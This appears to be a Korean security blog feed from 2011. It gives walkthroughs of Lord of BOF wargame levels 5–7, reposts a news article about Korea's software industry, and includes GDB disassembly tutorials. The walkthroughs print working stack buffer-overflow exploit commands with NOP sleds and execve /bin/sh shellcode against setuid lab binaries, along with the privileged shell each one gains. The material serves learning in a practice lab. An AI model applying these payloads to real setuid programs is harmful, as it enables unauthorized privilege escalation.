리눅스 시스템에도 바로가기가 존재합니다. 바로 심볼릭 링크라는게 존재합니다.

심볼릭 링크란 '어떤 파일을 가리키는 파일'을 말합니다.

http://kin.naver.com/qna/detail.nhn?d1id=1&dirId=1040203&docId=69358992&qb=66as64iF7IqkIOyLrOuzvOumrSDrp4Htgaw=&enc=utf8&section=kin&rank=2&search_sort=0&spq=0&pid=gCWQ8c5Y7uZssvHOdi0ssc--180253&sid=Tktf8PKFSk4AAD5dPtI

심볼릭링크를 생성하는 방법은 다음과 같습니다. ln -s 파일네임 복사할파일네임

ex) ln -s one two

이러면 two 라는 바로가기 파일이 생기는데, 아무런 내용도 없습니다.

단지 실행하면 파일 one 에 연결해주는 역할을 합니다.

그러면 우리가 공격해야 하는 대상의 파일에 심볼릭 링크를 걸어봅시다.

[darkelf@localhost darkelf]$ ls

orge orge.c xodnr

[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "a"*77'`

파이썬 스크립트를 이용해 프로그램 이름의 길이가 77 인 프로그램을 만들었습니다.

[darkelf@localhost darkelf]$ ls

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

orge

orge.c

xodnr

좀 더 정확하게 보겠습니다.

[darkelf@localhost darkelf]$ ls -l

total 24

lrwxrwxrwx 1 darkelf darkelf 4 Jun 6 10:21 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -> orge // 이 부분을 보고 심볼릭링크가 걸려있다는 것을 확인할 수 있습니다.!

-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge

-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c

drwxrwxr-x 2 darkelf darkelf 4096 Jun 6 10:13 xodnr

[darkelf@localhost darkelf]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

argv error

정상적으로 프로그램이 실행됩니다.

그러면 저 심볼릭링크가 걸려있는 파일을 대상으로 페이로드를 구성해봅시다.

공격방식은 전과 같습니다.

Argv[1] == "\xbf"*48 / Argv[2] == 무수히 많은 NOP + SHELLCODE

바로 bash2 만 실행하고 전에 사용했던 스크립트를 사용하겠습니다.

**********(이게 계속 사용할 수 있는 이유는 아까 말했지만 Argv[2] 를 RET 의 주소로 해주었는데

무수히 많은 NOP 가 들어있어 주소값 오차가 아무리 큰다하들 권한을 획득할 수 있다.)**********

[darkelf@localhost darkelf]$ bash2

[darkelf@localhost darkelf]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\xbf"*44 + "\x2e\x87\xff\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

argv[0] error

엇?! 정상적으로 프로그램이 실행되어야하는데 여기서 에러가 출력됩니다.

왜 그런지는 상대경로에 문제가 있습니다.

우선 Argv[0] 이 과연 프로그램 이름을 인자로 받는다고 하였는데 어떻게 받을까요?

이럴떄는 직접 코딩을 해서 확인해봅시다.

[darkelf@localhost xodnr]$ cat orgetest.c

#include<stdio.h>

int main(int argc, char *argv[])

{

printf("%s\n", argv[0]);

}

이러한 소스를 구성했습니다.

[darkelf@localhost xodnr]$ ls

orgetest.c

[darkelf@localhost xodnr]$ gcc -o orgetest orgetest.c

[darkelf@localhost xodnr]$ ./orgetest

./orgetest

뭐가 문제인지 눈치채셨습니까?

Argv[0] 에서 프로그램을 인자로 받을때는

orgetest 로 받는게 아닌 ./ 가 붙은 ./orgetest 가 붙기 때문에

우리는 심볼릭링크로 저장해줄떄 *77 이 아닌 *75 를 해줘야됩니다.

그러면 다시 한번 75 로 저장하고 페이로드를 구성하고 공략해보겠습니다.

[darkelf@localhost xodnr]$ cd ..

[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "a"*75'`

[darkelf@localhost darkelf]$ ls

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -> 길이가 75 인 orge

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -> 길이가 77 인 orge

orge

orge.c

xodnr

[darkelf@localhost darkelf]$

[darkelf@localhost darkelf]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\xbf"*44 + "\x2e\x87\xff\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿.‡ÿ¿

bash$ id

uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)

bash$ my-pass

euid = 507

[ 패스워드 ]

성공적으로 문제가 풀어졌습니다.

상대경로는 위와같이 현재 위치에서 보는 파일의 경로이며 절대경로는 파일의 전체경로 입니다.

[BOF-Wargames] LOB Load of BOF LEVEL6 (wolfman -> darkelf)

XoDNr_ 깝태 — Fri, 19 Aug 2011 21:37:37 +0900

-------------------------------------------------------------------------------------------------------------------------
LOB Level6 [ Wolfman -> Darkelf

-------------------------------------------------------------------------------------------------------------------------

[wolfman@localhost wolfman]$ ls

darkelf darkelf.c

[wolfman@localhost wolfman]$ ./darkelf

argv error

[wolfman@localhost wolfman]$ cat darkelf.c

The Lord of the BOF : The Fellowship of the BOF

- darkelf

- egghunter + buffer hunter + check length of argv[1]

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n"); // argv[1] 의 길이가 48보다 클 경우 에러메세지 출력

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

}

# 이번에는 인자의 길이를 검사하는 게 생겨났다.

# 하지만 이번문제 또한 여태까지 풀어왔던 문제와 계속 똑같다.

# 이 인자의 길이를 검사하는 부분의 역할은 그 뒤에 페이로드를 더 쓰게하는것을 막는다.

`python -c 'print "\xbf"*48'`

나는 계속 이렇게 페이로드를 구성했는데 그 뒤에 더 입력하는걸 제하는 역할을 한다.

한마디로 예를 들자면

`python -c 'print "\xbf"*48 + "\xbf"*48'`

저런걸 금하는 역할을 한다는 말이다. 뒤에 + 를 붙이고 더 이어가는것을 못하게 한다.

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault

48개를 넘겨주었을때 세그멘테이션 폴트가 뜬다. 아까와 똑같이 공격이 가능하다.

더 살펴보자면 아까 스크립트를 넘겨줄때 Argv[1] 에서 "\bf" 를 48개 넘겨주고 Argv[2] 에 NOP 와

쉘코드를 올려놓고 공격하였다. Argv[1] 에서 세그폴트가 뜨므로 가능했던거다, 물론 이 문제에서도 가능하다.

그래서 한 마디로 아까 풀었던 방식으로 또 문제를 푸는게 가능하다는 말이다.

그래서 Bash2 만 실행해보고 Argv[2] 에 NOP 와 쉘코드를 올려주고, Argv[1] 에 Argv[2] 의 주소를 올려놓는

똑같은 방식으로 스크립트를 날려보겠다.

[wolfman@localhost wolfman]$ bash2

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44 + "\x2e\x87\xff\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿.‡ÿ¿

bash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)

bash$ my-pass

euid = 506

[ 패스워드 ]

[BOF-Wargames] LOB Load of BOF LEVEL5 (orc -> wolfman) 문제풀이

XoDNr_ 깝태 — Fri, 19 Aug 2011 21:35:33 +0900

-------------------------------------------------------------------------------------------------------------------------
LOB Level5 [ Orc -> Wolfman ]

-------------------------------------------------------------------------------------------------------------------------

[orc@localhost orc]$ ls

wolfman wolfman.c xodnr

[orc@localhost orc]$ ./wolfman aa aa

stack is still your friend.

[orc@localhost orc]$ cat wolfman.c

The Lord of the BOF : The Fellowship of the BOF

- wolfman

- egghunter + buffer hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40); // buffer 부분을 40바이트까지 0 으로 채워버립니다. - http://itguru.tistory.com/104

}

# 이번 문제에서는 40바이트를 0 으로 덮어 쉘코드를 못 쓰게 할 작정이다.

# 4바이트 쉘코드는 없으니깐 ?!

다른건 오크문제와 똑같지만 한 부분만 다릅니다. memset(buffer, 0, 40); 그러나 어려울건 없습니다.

메모리부분을 그냥 정해진 문자로 채우는 역할을 합니다.

예를 들어 10개의 buffer 있다고 치고 A 를 모두 입력해줬습니다.

AAAAAAAAAA, 이렇게 되는데 만약 다음과 같은 소스가 있다면 memset(buffer, B, 6); 6바이트까지 B 로 채웁니다.

BBBBBBAAA, 이렇게 됩니다.

한 마디로 그냥 메모리 부분을 채울뿐 어떤 심각한 영향을 미칠만한 역할을 하지 않는다 이겁니다.

고로 오크떄 날려주었던 스크립트를 똑같이 날려줘봅시다.

물론 주소값 차이가 심할수도 있지만 NOP 를 30000개나 넣어주었기에 바로 될거라고 생각됩니다.

[orc@localhost orc]$ bash2

[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44 + "\x2e\x87\xff\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿.‡ÿ¿

bash$ id

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ my-pass

euid = 505

[ 패스워드 ]

공격에 성공하였습니다.

[위기의 한국 SW 산업] 명문대 나와도 SW개발자는 시간급 인생…"장가가기도 힘들어"

XoDNr_ 깝태 — Fri, 19 Aug 2011 14:00:37 +0900

원본링크 : http://news.chosun.com/site/data/html_dir/2011/08/19/2011081900309.html

-------------------------------------------------------------------------------

한국에 애플·구글이 없는 이유… 젊은 층의 소프트웨어 외면 가속화
배우는 학생이 없다 - 90년대 초엔 의대보다 인기, 요즘은 충원 걱정할 정도
정부·기업의 푸대접 - SW 개발을 단순 노동 취급… 투자 안하고 베껴쓰기 선호

1991학년도 대입 학력고사 전국 수석은 전남 목포 덕인고 출신인 한모(37)씨였다. 그가 지원한 곳은 의예과도, 전기공학과도 아닌 서울대 컴퓨터공학과였다. 1980년대 후반부터 1990년대 중반까지 컴퓨터공학과는 최고 인기 학과였다. 대성학원이 만든 '1993학년도 학력고사 점수별 대학 입학 배치 기준표'를 보면 알 수 있다. 이과 계열 제일 윗줄에는 서울대 컴퓨터공학과와 물리학과 등 2개 과가 있고, 그 밑으로 전기·전자·제어공학과군, 의예과, 기계공학과가 자리를 잡고 있다.

문송천 KAIST 교수는 "1980년대에서 1990년대 초반까지만 해도 '제2의 빌 게이츠'를 꿈꾸며 세계적인 소프트웨어를 개발하기 위해 컴퓨터공학과로 몰려드는 학생이 많았다"고 말했다. 지금의 NHN, 넥슨을 만든 이해진 의장, 김정주 회장이 바로 그런 꿈을 안고 서울대 컴퓨터공학과로 들어갔던 이들이다.

지금은 어떨까. 대성학원이 지난해 만든 '2011학년도의 대입 지원 가능 대학·학과 참조 자료'의 이과계열 제일 위칸에는 서울대 의예과가 있다. 그 밑으로 서울과 지방 대학의 모든 의예과와 한의예과, 치의예과들이 자리 잡고 있다. 그 밑에는 서울대 화학·생물·재료·건축·기계공학·수학과 등이 나오고, 다시 그 밑에야 비로소 전기·컴퓨터공학부가 등장한다.

◆망가진 소프트웨어 인재 양성 시스템

15~20년 사이 도대체 무슨 일이 있었기에 소프트웨어 산업의 산실(産室)이 이처럼 몰락했을까. 한국에서 소프트웨어 분야로 진출해서는 미래가 보이지 않기 때문이다.

황모(33)씨는 컴퓨터공학 석사를 마치고 2년간 소프트웨어 개발회사에 다니다 퇴직하고 지난해 법학전문대학원(로스쿨)에 입학했다. 그는 "선배들을 보니 이 바닥에 계속 있다가는 장가도 못 갈 것 같아서 그만두었다"고 말했다. 밤 12시, 새벽 1~2시까지 밥 먹듯 야근하는 선배들의 연봉이 3000만원이 채 되지 않더라는 것이다.

이러다 보니 컴퓨터공학과를 선택했던 학생들도 중간에 다른 길로 빠지거나 아예 한국을 떠나는 경우가 적지 않다. KAIST 출신 박모(34)씨가 그렇다. 박씨는 대학원 시절에는 유명 학술지에 논문을 여러 편 쓸 정도로 실력을 인정받았다. 대기업 계열 SI업체에 들어간 그는 4년 전 회사를 퇴직하고 미국 실리콘밸리로 떠났다. 박씨는 "참신한 소프트웨어 아이디어를 내봤지만 조금도 받아들여지지 않고 기존 프로그램 유지 보수만 시키는 데 좌절했다"고 말했다.

▲ 이미지를 클릭하시면 스냅샷으로 크게 볼 수 있습니다. / 조선닷컴 세계 최대 소셜네트워킹서비스 페이스북의 창업자 마크 저커버그는 중학교 시절 프로그램을 만들기 시작했으며 하버드대학에서 컴퓨터공학을 전공한 인물이다. /AFP

◆소프트웨어 개발을 일당제 노동자로 대접

IT업계에서는 우수 인재들의 소프트웨어 푸대접 구조를 만든 것은 정부의 소프트웨어 개발비 산정 방식이라고 입을 모은다. 정부는 소프트웨어 기술자의 등급을 실력과는 무관하게 학력과 연차에 따라서 매긴다. 개발 업무를 발주하면 연차에 따라 시간급에 차등을 주어 지급한다. 건설업계의 노무 인력에 적용하는 방식과 유사하다. 개발 업체는 고급 개발자는 시급 단가가 비싸기 때문에 중급 개발자로 대체하기 일쑤다. 그러다 보니 실력을 쌓은 고급 개발자는 개발에 참여하지 못하고 매니저로 승급하거나 현장을 떠나는 경우가 대부분이다.

KTH 박태웅 부사장은 "혁신적인 소프트웨어를 만들 수 있는 사람과 시킨 일만 하는 평범한 사람이 똑같은 대접을 받는데 어떤 천재가 이 업계로 들어오겠느냐"고 했다.

소프트웨어 분야에서 인수·합병(M&A)이 거의 없고, 대기업들이 소프트웨어를 푸대접하는 것도 문제다. 세계 최대의 동영상 서비스 유튜브, 스마트폰 운영체제 안드로이드 창업자는 모두 구글에 인수되면서 돈방석에 올랐다. 그런 소프트웨어 창업의 '대박 신화'가 미국의 젊은 인재들을 계속 소프트웨어 창업에 뛰어들게 만들고 있다.

국내 소프트웨어 업계에서는 중소 소프트웨어 업체가 그럴듯한 소프트웨어를 만들어 시장에 내놓으면 M&A는커녕 얼마 지나지 않아 거의 똑같은 소프트웨어를 대기업이 내놓는 사례가 비일비재하다. 해당 소프트웨어 업체는 고사할 수밖에 없다. 그러니 소프트웨어 분야로 뛰어들어 도전하려는 젊은이가 드물다.

안철수 서울대 융합과학기술대학원장은 "소프트웨어 분야는 실력이 뛰어난 2~3명이 책상 하나로도 창업할 수 있다"며 "우리도 성공한 소프트웨어 기업에 대해 정당한 대가를 주고 인수하는 M&A 문화가 활성화돼야 뛰어난 인재들이 소프트웨어 산업에 몰릴 수 있다"고 말했다.

[GDB-Analysis] GDB 바이너리 디버깅 3

XoDNr_ 깝태 — Thu, 18 Aug 2011 13:26:02 +0900

이번에는 저번에 두개로 했던 것들과 strcat 함수를 곁들여 컴파일해 디버깅을 해보도록 하겠습니다.

다음부터는 버퍼 오버플로우와 관련된 함수를 주제로 디버깅 연습을 해갈 생각입니다.

[gate@localhost tmp]$ cat t3.c

#include<stdio.h>

#include<stdlib.h>

int main(int argc, char *argv[])

{

char buffer[40];

printf("%d ", argc);

printf("%s ", argv[0]);

printf("%s ", argv[1]);

printf("%s ", argv[2]);

printf("%s\n", argv[3]);

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

strcat(argv[2], argv[3]);

printf("%s\n", argv[2]);

return 0;

}

[gate@localhost tmp]$ ./t3 1 2 3 4

5 ./t3 1 2 3

1 // Argv[1] == Buffer

23 // Argv[2] + Argv[3]

[gate@localhost tmp]$ gdb -q t3

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>: push %ebp

0x8048441 <main+1>: mov %esp,%ebp // 프롤로그

0x8048443 <main+3>: sub $0x28,%esp // 변수 40바이트 선언

0x8048446 <main+6>: mov 0x8(%ebp),%eax // EAX 에 (EBP+8) 값 복사 - (EBP+8) == Argc

0x8048449 <main+9>: push %eax // EAX 푸시

0x804844a <main+10>: push $0x8048560 // 0x8048560 푸시 - %d

0x804844f <main+15>: call 0x8048364 <printf>

// printf("%d ", argc);

0x8048454 <main+20>: add $0x8,%esp // ESP + 8

0x8048457 <main+23>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - (EBP+12) == Argv[0]

0x804845a <main+26>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x804845c <main+28>: push %edx // EDX 푸시

0x804845d <main+29>: push $0x8048565 // 0x8048565 푸시 - %s

0x8048462 <main+34>: call 0x8048364 <printf>

// printf("%s ", argv[0]);

0x8048467 <main+39>: add $0x8,%esp // ESP + 8

0x804846a <main+42>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x804846d <main+45>: add $0x4,%eax // EAX + 4 - Argv[0] + 4 == Argv[1]

0x8048470 <main+48>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x8048472 <main+50>: push %edx // EDX 푸시

0x8048473 <main+51>: push $0x8048565 // 0x8048565 푸시

0x8048478 <main+56>: call 0x8048364 <printf>

// printf("%s ", argv[1]);

0x804847d <main+61>: add $0x8,%esp

0x8048480 <main+64>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x8048483 <main+67>: add $0x8,%eax // Argv[0] + 8 == Argv[2]

0x8048486 <main+70>: mov (%eax),%edx

0x8048488 <main+72>: push %edx

0x8048489 <main+73>: push $0x8048565

0x804848e <main+78>: call 0x8048364 <printf>

// printf("%s ", argv[2]);

0x8048493 <main+83>: add $0x8,%esp

0x8048496 <main+86>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x8048499 <main+89>: add $0xc,%eax // Argv[0] + 12 == Argv[3]

0x804849c <main+92>: mov (%eax),%edx

0x804849e <main+94>: push %edx

0x804849f <main+95>: push $0x804856a

0x80484a4 <main+100>: call 0x8048364 <printf>

// printf("%s ", argv[3]);

0x80484a9 <main+105>: add $0x8,%esp // ESP + 8

0x80484ac <main+108>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x80484af <main+111>: add $0x4,%eax // EAX + 4 == Argv[1]

0x80484b2 <main+114>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x80484b4 <main+116>: push %edx // EDX 푸시

0x80484b5 <main+117>: lea 0xffffffd8(%ebp),%eax // EAX 에 (EBP-40) 주소 값 복사 - Buffer

0x80484b8 <main+120>: push %eax // EAX 푸시

0x80484b9 <main+121>: call 0x8048374 <strcpy>

// strcpy(buffer, argv[1]);

EAX , EDX

0x80484be <main+126>: add $0x8,%esp

0x80484c1 <main+129>: lea 0xffffffd8(%ebp),%eax // EAX 에 (EBP-40) 주소값 복사 - Buffer

0x80484c4 <main+132>: push %eax // EAX 푸시

0x80484c5 <main+133>: push $0x804856a // 0x804856a 푸시 - %s\n

0x80484ca <main+138>: call 0x8048364 <printf>

0x80484cf <main+143>: add $0x8,%esp // ESP + 8

0x80484d2 <main+146>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x80484d5 <main+149>: add $0xc,%eax // EAX + 12 == Argv[3]

0x80484d8 <main+152>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x80484da <main+154>: push %edx // EDX(1) 푸시

0x80484db <main+155>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x80484de <main+158>: add $0x8,%eax // EAX + 8 == Argv[2]

0x80484e1 <main+161>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x80484e3 <main+163>: push %edx // EDX(2) 푸시

0x80484e4 <main+164>: call 0x8048354 <strcat>

// strcat(argv[2], argv[3]);

EDX(2), EDX(1)

0x80484e9 <main+169>: add $0x8,%esp

0x80484ec <main+172>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - Argv[0]

0x80484ef <main+175>: add $0x8,%eax // EAX + 8 == Argv[2]

0x80484f2 <main+178>: mov (%eax),%edx

0x80484f4 <main+180>: push %edx

0x80484f5 <main+181>: push $0x804856a

0x80484fa <main+186>: call 0x8048364 <printf>

// printf("%s\n", argv[2]);

0x80484ff <main+191>: add $0x8,%esp

0x8048502 <main+194>: xor %eax,%eax // EAX 초기화

0x8048504 <main+196>: jmp 0x8048506 <main+198>

0x8048506 <main+198>: leave

0x8048507 <main+199>: ret // 에필로그

/* 생략 */

End of assembler dump.

메모리 구조를 확인해봅시다.

EBP-40 EBP EBP+4 EBP+8 +12 +16 +20 +24

그래서 인자를 확인할떄는 먼저 Argv[0] 으로 (EBP+12) 이동 한 후 4 씩 늘려가지만

Buffer 을 참조해야할때는 (EBP-40) 의 주소 값을 복사하는겁니다.

Strcat 함수를 디버깅 해보았는데 그다지 어렵지 않았고 매우 쉬웠습니다.

다만 인자를 거꾸로 참조한다는것만 알아두면 될것같습니다. 그런데 인자를 거꾸로 넣는건 함수는

원래 다그렇습니다. cdcel 방식 때문에 그렇다는데 자세한 설명은 다음기회로 미루겠습니다.

[GDB-Analysis] GDB 바이너리 디버깅 2

XoDNr_ 깝태 — Wed, 17 Aug 2011 20:04:16 +0900

이번에는 버퍼 오버플로우 취약점으로 자주 등장하는 strcpy 함수를 디버깅 해보겠습니다.

너무 쉬워보일수도 있겠지만 모든것들이 패턴이 있습니다. 함수가 호출되기전에 어떻게 인자를

참조하는지 이 작업은 무엇을 의미하는지, 저 또한 공부한지 별로 안됬지만 조금 알것같습니다.

이런 밑거름들을 차근차근 해나가다가 나중에는 워게임 하나를 디버깅해 취약점을 찾아낸다는지..

가능할겁니다.

[gate@localhost tmp]$ cat t2.c

int main(int argc, char *argv[])

{

char buffer[40];

strcpy(buffer, argv[1]); // argv[1] 을 buffer 에 복사합니다.

printf("%s\n", buffer); // 복사된 buffer 을 출력합니다.

}

[gate@localhost tmp]$ ./t2 buffer

buffer

고로 인자로 전달해주는 값에 따라 출력되어지는 값도 달라질겁니다.

[gate@localhost tmp]$ gdb -q t2

(gdb) disas main

Dump of assembler code for function main:

0x80483f8 <main>: push %ebp

0x80483f9 <main+1>: mov %esp,%ebp // 프롤로그

0x80483fb <main+3>: sub $0x28,%esp // 변수 40바이트 선언

0x80483fe <main+6>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 의 값을 복사한다. - (EBP+12) == Argv[0]

0x8048401 <main+9>: add $0x4,%eax // EAX+4 - Argv[0] + 4 == Argv[1]

0x8048404 <main+12>: mov (%eax),%edx // EDX 에 EAX 의 값을 복사한다.

0x8048406 <main+14>: push %edx // EDX푸시

0x8048407 <main+15>: lea 0xffffffd8(%ebp),%eax // EAX 에 (EBP-40) 의 값을 복사한다.

0x804840a <main+18>: push %eax // EAX 푸시

0x804840b <main+19>: call 0x8048340 <strcpy>

strcpy(buffer, argv[1]); 호출작업입니다.

Argv[1] 을 푸시하기위해 EAX(Argv[0]) 에 +4 를 하고 EDX 에 옮긴 후 푸시했으며

Buffer 를 인자로 가져오기 위해 (EBP-40) 주소 값(Buffer 의 주소값) 을 참조합니다.

아마 EBP 는 현재 아무런 움직임을 가지지 않았으며 꼭대기에 그대로 있나봅니다.

0x8048410 <main+24>: add $0x8,%esp // ESP + 8

0x8048413 <main+27>: lea 0xffffffd8(%ebp),%eax // EAX 에 (EBP-40) 주소 값을 복사합니다.

0x8048416 <main+30>: push %eax // EAX 를 푸시합니다.

0x8048417 <main+31>: push $0x8048480 // "%s\n" 을 푸시합니다.

// 0x8048480 <_IO_stdin_used+4>: "%s\n"

0x804841c <main+36>: call 0x8048330 <printf>

// printf("%s\n", buffer);

0x8048421 <main+41>: add $0x8,%esp

0x8048424 <main+44>: leave

0x8048425 <main+45>: ret

/* 생략 */

End of assembler dump.

(gdb) b *main+19

Breakpoint 2 at 0x804840b

(gdb) r aaaa

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t2 aaaa

Breakpoint 2, 0x804840b in main ()

(gdb) x/s $edx

0xbffffcaf: "aaaa" // 우리가 입력해주었던 Argv[1] 이 존재합니다

두 번째로 Buffer 의 주소값을 참조하는 과정입니다.

(gdb) b *main+19

Breakpoint 5 at 0x804840b

(gdb) r aaaa

The program being debugged has been started already.

Start it from the beginning? (y or n)

Please answer y or n.

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t2 aaaa

Breakpoint 4, 0x804840a in main ()

(gdb) x/s $ebp-40

(gdb) x/s $eax

이로써 이번 문제의 분석과정은 끝났습니다.

복사해야할 것을 먼저 푸시하고 붙여줘야되는곳을 푸시했습니다.

소스가 짧아서 그런건지 매우 쉬웠습니다.

[GDB-Analysis] GDB 바이너리 디버깅 1

XoDNr_ 깝태 — Wed, 17 Aug 2011 13:16:09 +0900

제가 직접 간단하게 소스를 만들어 디버깅을 할 생각입니다.

워게임을 풀면서 많이나오는 소스들을 가지고 디버깅을 해볼 생각입니다. (argv, strncpy 인자 불러오기 등등)

물론 IDA 로해야지 쉽고 빠르지만 그것보다 평소 디버깅 실력을 높이기위해 도전해봅니다.

제일 처음으로 GDB 로 디버깅을 하여 강의할 프로그램은 다음과 같습니다.

[gate@localhost tmp]$ cat t1.c

#include<stdio.h>

int main(int argc, char *argv[])

{

printf("%s ", argv[0]);

printf("%s ", argv[1]);

printf("%s ", argv[2]);

printf("%s\n", argv[3]);

return 0;

}

[gate@localhost tmp]$ ./t1 1 2 3 4

./t1 1 2 3

인자 4개를 출력해주는 프로그램 입니다.

바로 디버깅을 시작해보겠습니다.

[gate@localhost tmp]$ gdb -q t1

(gdb) disas main

Dump of assembler code for function main:

0x80483d0 <main>: push %ebp

0x80483d1 <main+1>: mov %esp,%ebp

0x80483d3 <main+3>: mov 0xc(%ebp),%eax

0x80483d6 <main+6>: mov (%eax),%edx

0x80483d8 <main+8>: push %edx

0x80483d9 <main+9>: push $0x8048490

0x80483de <main+14>: call 0x8048308 <printf>

0x80483e3 <main+19>: add $0x8,%esp

0x80483e6 <main+22>: mov 0xc(%ebp),%eax

0x80483e9 <main+25>: add $0x4,%eax

0x80483ec <main+28>: mov (%eax),%edx

0x80483ee <main+30>: push %edx

0x80483ef <main+31>: push $0x8048490

0x80483f4 <main+36>: call 0x8048308 <printf>

0x80483f9 <main+41>: add $0x8,%esp

0x80483fc <main+44>: mov 0xc(%ebp),%eax

0x80483ff <main+47>: add $0x8,%eax

0x8048402 <main+50>: mov (%eax),%edx

0x8048404 <main+52>: push %edx

0x8048405 <main+53>: push $0x8048490

0x804840a <main+58>: call 0x8048308 <printf>

0x804840f <main+63>: add $0x8,%esp

---Type <return> to continue, or q <return> to quit---

0x8048412 <main+66>: mov 0xc(%ebp),%eax

0x8048415 <main+69>: add $0xc,%eax

0x8048418 <main+72>: mov (%eax),%edx

0x804841a <main+74>: push %edx

0x804841b <main+75>: push $0x8048495

0x8048420 <main+80>: call 0x8048308 <printf>

0x8048425 <main+85>: add $0x8,%esp

0x8048428 <main+88>: xor %eax,%eax

0x804842a <main+90>: jmp 0x8048430 <main+96>

0x804842c <main+92>: lea 0x0(%esi,1),%esi

0x8048430 <main+96>: leave

0x8048431 <main+97>: ret

0x8048432 <main+98>: nop

0x8048433 <main+99>: nop

0x8048434 <main+100>: nop

0x8048435 <main+101>: nop

0x8048436 <main+102>: nop

0x8048437 <main+103>: nop

0x8048438 <main+104>: nop

0x8048439 <main+105>: nop

0x804843a <main+106>: nop

0x804843b <main+107>: nop

0x804843c <main+108>: nop

---Type <return> to continue, or q <return> to quit---

0x804843d <main+109>: nop

0x804843e <main+110>: nop
